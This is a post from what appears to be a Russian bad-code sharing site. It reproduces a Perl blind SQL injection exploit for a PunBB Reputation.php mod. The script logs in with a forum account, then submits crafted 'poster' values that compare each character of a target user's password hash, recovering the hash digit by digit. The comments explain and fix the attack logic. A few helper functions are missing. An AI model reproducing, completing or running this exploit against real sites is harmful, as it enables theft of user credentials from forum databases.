1. Perl / Говнокод #14364


    #!/usr/bin/perl
    #[0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit
    #Coded By Dante90, WaRWolFz Crew
    #Bug Discovered By: Dante90, WaRWolFz Crew
    
    use strict;
    use warnings;

    use HTTP::Cookies;
    use HTTP::Request::Common;
    use IO::Socket;
    use LWP::UserAgent;
    use Time::HiRes;
    
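    # Command line: <forum username> <forum password> <target user id>.
    # The credentials belong to an ordinary account on the target forum; $ID
    # selects the row in `users` whose password hash is read back one hex
    # digit at a time by the loop below.  Only use this against a system you
    # are authorized to test.
    my ($UserName, $PassWord, $ID) = @ARGV;
    if (@ARGV < 3) {
        usage();    # usage() is not defined anywhere in this listing
        exit();
    }

    my $Message = "";    # status text handed to refresh() on every update
    # $Time is refreshed after each request; the remaining timing variables
    # are declared but never used in this listing.
    my ($Hash, $Time, $Time_Start, $Time_End, $Response);
    my ($Start, $End);

    # ASCII codes of the hex alphabet 0-9a-f (48..57, 97..102): the 16
    # candidate values tried at each position of the 40-digit hash.  The
    # original listing had the last element mangled as "10  2", which does
    # not parse; deriving the list from the characters avoids that.
    my @chars = map { ord($_) } ('0' .. '9', 'a' .. 'f');

    # Target base URL; the trailing slash is required because 'login.php' and
    # 'reputation.php' are appended to it directly.
    my $Host = "http://www.victime_site.org/path/";
    my $Method  = HTTP::Request->new(POST => $Host);    # unused below; kept for compatibility
    my $Cookies = HTTP::Cookies->new;
    my $HTTP    = LWP::UserAgent->new(
        agent        => 'Mozilla/5.0',
        max_redirect => 0,           # redirects are not followed; Login() reads the first response body
        cookie_jar   => $Cookies,    # session cookie from login.php is reused by later requests
    );

    # Despite its name this is a POST body, not a Referer header: a benign
    # reputation-form submission that request() (not defined in this listing,
    # presumably a timing helper given Time::HiRes) uses to take a baseline.
    my $Referrer = "form_sent=1&pid=10174&poster=Dante90, WaRWolFz Crew&method=1&req_message=http://www.warwolfz.com/&submit=Invia";
    my $DefaultTime = request($Referrer);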
    
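    # Log in to the target forum with the credentials from @ARGV so that the
    # cookie jar attached to $HTTP carries a session for the later requests.
    # Returns 1 when the response body contains PunBB's success message and
    # 0 otherwise (bad credentials, error page, unreachable host, ...).
    # The empty prototype "()" of the original was dropped: it only
    # restricted parsing, never validated anything.
    sub Login {
        # $HTTP->post always returns an HTTP::Response object, so the
        # original "|| die $!" could never fire and was removed.
        my $Login = $HTTP->post(
            $Host . 'login.php?action=in',
            [
                form_sent    => '1',
                redirect_url => 'forums.php',
                req_username => $UserName,
                req_password => $PassWord,
                login        => 'Login',
            ],
        );

        # Redirects are not followed (max_redirect => 0), so the success
        # message is looked for in the first response body.
        return $Login->content =~ /Logged in successfully./i ? 1 : 0;
    }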
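    # Authenticate exactly once.  The original evaluated Login() a second time
    # in the elsif branch, re-posting the credentials after a failure (and, had
    # that retry succeeded, falling through with neither branch taken).
    if (Login() == 1) {
        $Message = " * Logged in as: " . $UserName;
    }
    else {
        $Message = " * Login Failed.";
        # refresh() is not defined in this listing; $Hash and $Time are still
        # undef at this point, as in the original.
        refresh($Message, $Host, $DefaultTime, "0", $Hash, $Time, "1");
        print " * Exploit Failed                                     *\n";
        print " ------------------------------------------------------ \n";
        exit;
    }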
    
    # Build the value submitted in the "poster" field.  The embedded double
    # quote closes the string literal in the vulnerable query, the OR clause
    # compares one character of the target user's `password` with $code, and
    # the trailing "/*" comments out whatever follows.
    #   $pos  - 1-based SUBSTRING offset of the character being probed
    #   $code - ASCII value the character is compared against
    # The sub name (a typo for "Injection") is kept because the loop below
    # calls it by this name; the "Dante90, WaRWolFz Crew" prefix is part of
    # the payload and is reproduced verbatim.
    sub Blind_SQL_Jnjection {
        my ($pos, $code) = @_;
        my $subquery = "SELECT `password` FROM `users` WHERE `id`=${ID}";
        return sprintf('Dante90, WaRWolFz Crew" OR ASCII(SUBSTRING((%s),%s,1))=%s/*',
                       $subquery, $pos, $code);
    }
    
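    # Recover the hash one hex digit at a time.  For each position every one
    # of the 16 candidate codes is submitted through the injectable "poster"
    # field; a candidate is confirmed when reputation.php answers with its
    # success message (boolean-based blind injection).  request() and
    # refresh() are not defined in this listing; they appear to be a timing
    # probe and a screen update and are called exactly as before.
    my $HashLength = 40;    # number of hex digits probed

    for my $I (1 .. $HashLength) {
        my $found = 0;
        for my $J (0 .. $#chars) {
            # $HTTP->post always returns a response object; the original
            # "|| die $!" was dead code and was removed.
            my $Post = $HTTP->post(
                $Host . 'reputation.php?',
                [
                    form_sent   => '1',
                    pid         => '2',
                    poster      => Blind_SQL_Jnjection($I, $chars[$J]),
                    method      => '1',
                    req_message => 'http://www.warwolfz.com/',
                    submit      => 'Submit',
                ],
            );
            $Time = request($Referrer);
            refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
            if ($Post->content =~ /(The reputation has been successfully changed)/i) {
                syswrite(STDOUT, chr($chars[$J]));    # unbuffered echo of the digit
                $Hash .= chr($chars[$J]);
                $Time = request($Referrer);
                refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
                $found = 1;
                last;
            }
        }

        # The original only detected a miss at position 1.  A miss at any
        # later position (error page, transient failure) silently produced a
        # shorter, misaligned $Hash and still printed the success banner.
        if (!$found) {
            print " * Exploit Failed                                     *\n";
            print " ------------------------------------------------------ \n";
            exit;
        }
    }

    # Reached only when every position matched (the loop exits on a miss).
    print " * Exploit Successed                                  *\n";
    print " ------------------------------------------------------\n ";
    system("pause") if $^O eq 'MSWin32';    # "pause" exists only in cmd.exe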

    http://mybbgavno.mybb.ru/register.php

    Запостил: Stertor, 15 Января 2014

